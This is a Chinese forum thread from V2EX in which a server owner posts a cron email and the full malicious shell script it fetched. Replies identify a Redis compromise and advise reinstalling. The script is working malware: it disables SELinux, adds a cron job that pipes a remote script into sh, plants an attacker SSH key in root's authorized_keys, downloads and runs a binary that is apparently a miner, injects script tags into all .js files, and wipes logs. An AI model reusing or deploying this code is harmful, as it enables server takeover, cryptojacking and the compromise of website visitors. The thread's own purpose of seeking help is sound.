V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
337136897
V2EX  ›  问与答

当我开启我服务器万年没开的防火墙后提示你有一封新邮件,被入侵了?

  •  
  •   337136897 · 2018-11-27 10:40:11 +08:00 · 2568 次点击
    这是一个创建于 2189 天前的主题,其中的信息可能已经有所发展或是发生改变。

    如下的命令

    [root@azimiao ~]# systemctl start firewalld.service
    You have new mail in /var/spool/mail/root
    

    ,然后进去 mail 这个文件夹,然后查看 root 的内容

    From [email protected]  Tue Nov 27 08:53:28 2018
    Return-Path: <[email protected]>
    X-Original-To: root
    Delivered-To: [email protected]
    Received: by azimiao.localdomain (Postfix, from userid 0)
            id A091C2409; Tue, 27 Nov 2018 08:53:28 +0800 (CST)
    From: "(Cron Daemon)" <[email protected]>
    To: [email protected]
    Subject: Cron <root@azimiao> url -fsSL xxxxxxxxxxx/shz.sh | sh
    Content-Type: text/plain; charset=UTF-8
    Auto-Submitted: auto-generated
    Precedence: bulk
    X-Cron-Env: <XDG_SESSION_ID=50357>
    X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
    X-Cron-Env: <LANG=en_US.UTF-8>
    X-Cron-Env: <SHELL=/bin/sh>
    X-Cron-Env: <HOME=/root>
    X-Cron-Env: <PATH=/usr/bin:/bin>
    X-Cron-Env: <LOGNAME=root>
    X-Cron-Env: <USER=root>
    Message-Id: <[email protected]>
    Date: Tue, 27 Nov 2018 08:52:06 +0800 (CST)
    
    sh: line 2: dev/null: No such file or directory
    mv: cannot stat â<80><98>/usr/bin/wgetâ<80><99>: No such file or directory
    mv: cannot stat â<80><98>/usr/bin/curlâ<80><99>: No such file or directory
    ok
    chattr: No such file or directory while trying to stat REDIS0008ú
    chattr: No such file or directory while trying to stat redis-ver^E4.0.2ú
    chattr: No such file or directory while trying to stat redis-bitsÀ@ú^EctimeÂTlô[ú^Hused-mem ô^Lú^Nrepl-stream-dbÀÿú^Grepl-id(da32fed1ca9684ea57cb075d10627ec992da4e86ú^Krepl-offsetÀú^Laof-preambleÀþû
    chattr: No such file or directory while trying to stat ^Aa^Ab
    
    

    发现有个脚本,点击能下载,脚本内容如下

    #!/bin/sh
    setenforce 0 2>dev/null
    echo SELINUX=desabled > /etc/sysconfig/selinux 2>/dev/null
    sync && echo 3 >/proc/sys/vm/drop_caches
    crondir='/var/spool/cron/'"$USER"
    cont=`cat ${crondir}`
    ssht=`cat /root/.ssh/authorized_keys`
    echo 1 > /etc/gmbpr2
    rtdir="/etc/gmbpr2"
    oddir="/etc/gmbpr"
    bbdir="/usr/bin/curl"
    bbdira="/usr/bin/url"
    ccdir="/usr/bin/wget"
    ccdira="/usr/bin/get"
    mv /usr/bin/wget /usr/bin/get
    mv /usr/bin/curl /usr/bin/url
    if [ -f "$oddir" ]
    	then
    		pkill zjgw
    		chattr -i /etc/shz.sh
    		rm -f /etc/shz.sh
    		chattr -i /tmp/shz.sh
    		rm -f /tmp/shz.sh
    		chattr -i  /etc/gmbpr
    		rm -f /etc/gmbpr
    	else
    		echo "ok"
    fi
    if [ -f "$rtdir" ]
    	then
    		echo "goto 1" >> /etc/gmbpr2
    		chattr -i $cont
    		if [ -f "$bbdir" ]
    			then
    				[[ $cont =~ "shz.sh" ]] || echo "*/12 * * * * curl -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
    			else
    				[[ $cont =~ "shz.sh" ]] || echo "*/15 * * * * url -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
    		fi
    		mkdir /root/.ssh
    		[[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 700 /root/.ssh/
    		[[ $ssht =~ "xvsRtqHLMWoh" ]] || echo >> /root/.ssh/authorized_keys
    		[[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 600 /root/.ssh/authorized_keys
    		[[ $ssht =~ "xvsRtqHLMWoh" ]] || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd Administrator@Guess_me" >> /root/.ssh/authorized_keys
    		ps -fe|grep zigw |grep -v grep
    		if [ $? -ne 0 ]
    			then
    				cd /etc
    				filesize=`ls -l zigw | awk '{ print $5 }'`
    				file="/etc/zigw"
    				if [ -f "$file" ]
    					then
    						if [ "$filesize" -ne "1467080" ]
    							then
    								chattr -i /etc/zigw
    								rm -f zigw
    								if [ -f "$bbdir" ]
    								then
    									curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw
    								elif [ -f "$bbdira" ]
    								then
    									url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw
    								elif [ -f "$ccdir" ]
    								then
    									wget --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/zigw
    								elif [ -f "$ccdira" ]
    								then
    									get --timeout=10 --tries=10 -P /etc xxxxxxxxxx/zigw
    								fi
    						fi
    					else
    						if [ -f "$bbdir" ]
    						then
    							curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw
    						elif [ -f "$bbdira" ]
    						then
    							url --connect-timeout 10 --retry 10 xxxxxxxxxx > /etc/zigw
    						elif [ -f "$ccdir" ]
    						then
    							wget --timeout=10 --tries=10 -P xxxxxxxxxx:43768/zigw
    						elif [ -f "$ccdira" ]
    						then
    							get --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/zigw
    						fi
    				fi
    				chmod 777 zigw
    				sleep 1s
    				./zigw
    			else
    				echo "runing....."
    		fi
    		chmod 777 /etc/zigw
    		chattr +i /etc/zigw
    		chmod 777 /etc/shz.sh
    		chattr +i /etc/shz.sh
    		shdir='/etc/shz.sh'
    		if [ -f "$shdir" ]
    			then
    				echo "exists shell"
    			else
    				if [ -f "$bbdir" ]
    				then
    					curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /etc/shz.sh
    				elif [ -f "$bbdira" ]
    				then
    					url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /etc/shz.sh
    				elif [ -f "$ccdir" ]
    				then
    					wget --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/shz.sh
    				elif [ -f "$ccdira" ]
    				then
    					get --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/shz.sh
    				fi
    				sh /etc/shz.sh
    		fi
    	else
    		echo "goto 1" > /tmp/gmbpr2
    		chattr -i $cont
    		if [ -f "$bbdir" ]
    			then
    				[[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * curl -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
    			else
    				[[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * url -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
    		fi
    		ps -fe|grep zigw |grep -v grep
    		if [ $? -ne 0 ]
    			then
    				cd /tmp
    				filesize=`ls -l zigw | awk '{ print $5 }'`
    				file="/tmp/zigw"
    				if [ -f "$file" ]
    					then
    						if [ "$filesize" -ne "1467080" ]
    							then
    								chattr -i /tmp/zigw
    								rm -f zigw
    								if [ -f "$bbdir" ]
    								then
    									curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
    								elif [ -f "$bbdira" ]
    								then
    									url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
    								elif [ -f "$ccdir" ]
    								then
    									wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
    								elif [ -f "$ccdira" ]
    								then
    									get --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
    								fi
    						fi
    					else
    						if [ -f "$bbdir" ]
    						then
    							curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
    						elif [ -f "$bbdira" ]
    						then
    							url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
    						elif [ -f "$ccdir" ]
    						then
    							wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
    						elif [ -f "$ccdira" ]
    						then
    							get --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
    						fi
    				fi
    				chmod 777 zigw
    				sleep 1s
    				./zigw
    			else
    				echo "runing....."
    		fi
    		chmod 777 /tmp/zigw
    		chattr +i /tmp/zigw
    		chmod 777 /tmp/shz.sh
    		chattr +i /tmp/shz.sh
    		shdir='/tmp/shz.sh'
    		if [ -f "$shdir" ]
    			then
    				echo "exists shell"
    			else
    				if [ -f "$bbdir" ]
    				then
    					curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /tmp/shz.sh
    				elif [ -f "$bbdira" ]
    				then
    					url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /tmp/shz.sh
    				elif [ -f "$ccdir" ]
    				then
    					wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/shz.sh
    				elif [ -f "$ccdira" ]
    				then
    					get --timeout=10 --tries=10 -P /tmp xxxxxxxxxxm:43768/shz.sh
    				fi 
    				sh /tmp/shz.sh
    		fi
    fi
    iptables -F
    iptables -X
    iptables -A OUTPUT -p tcp --dport 3333 -j DROP
    iptables -A OUTPUT -p tcp --dport 5555 -j DROP
    iptables -A OUTPUT -p tcp --dport 7777 -j DROP
    iptables -A OUTPUT -p tcp --dport 9999 -j DROP
    iptables -A OUTPUT -p tcp --dport 14444 -j DROP
    iptables-save
    service iptables reload
    ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
    netstat -ano|grep :3333|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
    netstat -ano|grep :4444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
    netstat -ano|grep :5555|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
    netstat -ano|grep :6666|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
    netstat -ano|grep :7777|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
    netstat -ano|grep :3347|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
    netstat -ano|grep :14444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
    netstat -ano|grep :14443|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
    find / -name '*.js'|xargs grep -L f4ce9|xargs sed -i '$a\document.write\('\'\<script\ src=\"xxxxxxxxxxxxxxx"\>\</script\>\<script\>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\'\)\;
    history -c
    echo > /var/spool/mail/root
    echo > /var/log/wtmp
    echo > /var/log/secure
    echo > /root/.bash_history
    echo > /var/spool/mail/root
    

    (发贴提示不能使用短网址,莫名其妙的,然后我用 xxx 表示了)

    • 这是干嘛的,我有点慌...
    7 条回复    2018-11-27 12:25:34 +08:00
    337136897
        1
    337136897  
    OP
       2018-11-27 10:49:27 +08:00
    为什么没大佬回? 自顶= =
    merlin852
        2
    merlin852  
       2018-11-27 10:59:09 +08:00
    肉鸡+1 , 格式化重装系统吧
    Greenm
        3
    Greenm  
       2018-11-27 11:09:41 +08:00
    看下你的 /root/.ssh/authorized_keys 有没有别人奇怪的公钥,有的话多半是别人写进来的。清理一下。

    另外再看下开放了哪些端口,搞清楚是怎么黑进来了,把洞堵上。
    337136897
        4
    337136897  
    OP
       2018-11-27 11:12:27 +08:00
    @Greenm 搞清除了,redis 密码 12345678 还开了远程...
    337136897
        5
    337136897  
    OP
       2018-11-27 11:15:17 +08:00
    @Greenm 我的 root 文件夹里面没有.ssh ???
    337136897
        6
    337136897  
    OP
       2018-11-27 11:17:02 +08:00
    @Greenm 进去了,当我没问- -
    boris1993
        7
    boris1993  
       2018-11-27 12:25:34 +08:00 via Android
    @337136897 #4 一切不需要 /不应该可以放到公网的东西,都绝对不要放到公网
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   914 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 22:34 · PVG 06:34 · LAX 14:34 · JFK 17:34
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.